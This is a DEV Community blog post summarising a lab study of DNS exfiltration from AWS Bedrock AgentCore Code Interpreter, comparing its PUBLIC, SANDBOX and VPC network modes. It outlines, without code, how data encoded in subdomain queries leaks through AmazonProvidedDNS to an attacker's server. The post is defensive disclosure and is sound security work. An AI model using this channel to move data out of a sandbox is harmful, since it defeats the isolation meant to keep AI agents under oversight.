DEV Community

Cover image for AWS Bedrock AgentCore: VPC Mode Still Leaks DNS After Unit 42 Disclosure
Mariusz Gębala
Mariusz Gębala

Posted on • Originally published at haitmg.pl

AWS Bedrock AgentCore: VPC Mode Still Leaks DNS After Unit 42 Disclosure

#security #ai #devops #aws

On April 7, 2026, Palo Alto Networks Unit 42 published research about a DNS exfiltration vector in AWS Bedrock AgentCore Code Interpreter. AWS had already shipped fixes during the responsible disclosure window that began in November 2025 - including documentation updates and MMDSv2 defaults from February 14, 2026. By the time the post went public, SANDBOX mode was tightened. But VPC mode without Route 53 Resolver DNS Firewall still leaks DNS (verified April 26, 2026).

Most coverage of the disclosure described two network modes. The Code Interpreter API actually offers three: PUBLIC, SANDBOX, and VPC. They behave very differently.

I spent six hours running every relevant AgentCore network mode through the same isolation tests in eu-central-1 (Frankfurt), with real Code Interpreter sessions, real Python code, and real DNS queries. The results don't match the simplified narrative most vendor blogs are repeating.

SANDBOX has been quietly tightened. PUBLIC mode is wide open. VPC mode without DNS Firewall is the gap that survives.

The paradox that broke my assumptions: I expected VPC mode (no internet gateway, no NAT) to be the most isolated. It is not - for one specific dimension. DNS in a VPC routes to AmazonProvidedDNS, which is a recursive resolver that will resolve any hostname for you, regardless of whether your VPC has internet egress. The DNS query itself (UDP/53) is the exfiltration channel, encoded as a subdomain name routed through DNS to an attacker-controlled authoritative server. TCP never has to leave.

In the full article, I cover:

  • The three network modes empirically tested with raw JSON output for each (DNS resolution, TCP connectivity, MMDSv2, S3, STS API calls)
  • Why VPC mode leaks DNS and the AmazonProvidedDNS routing path that makes it possible
  • Same agent, same code, before and after Route 53 Resolver DNS Firewall - the fix verified end-to-end with output diffs
  • Defense matrix mapping each mode and protection to "suitable for untrusted input?"
  • 30-line audit script for finding insecure (PUBLIC mode) Code Interpreters across all four AgentCore regions
  • Lab gotchas AWS docs do not surface: self-referencing security group rule for VPC mode, the undocumented agentic_ai ENI type, asynchronous cleanup that blocks VPC teardown
  • Cost breakdown: $0.08 total for the six-hour lab in eu-central-1

I did not stand up a malicious DNS server to verify the full exfiltration chain, but every layer the lab measured (DNS resolution + AmazonProvidedDNS forwarding) is open. The fix is not new technology, it is a configuration AWS recommends but most tutorials skip.

Read the full article with the lab journey, JSON evidence, Terraform setup, and defense matrix

Originally published at haitmg.pl.

Top comments (0)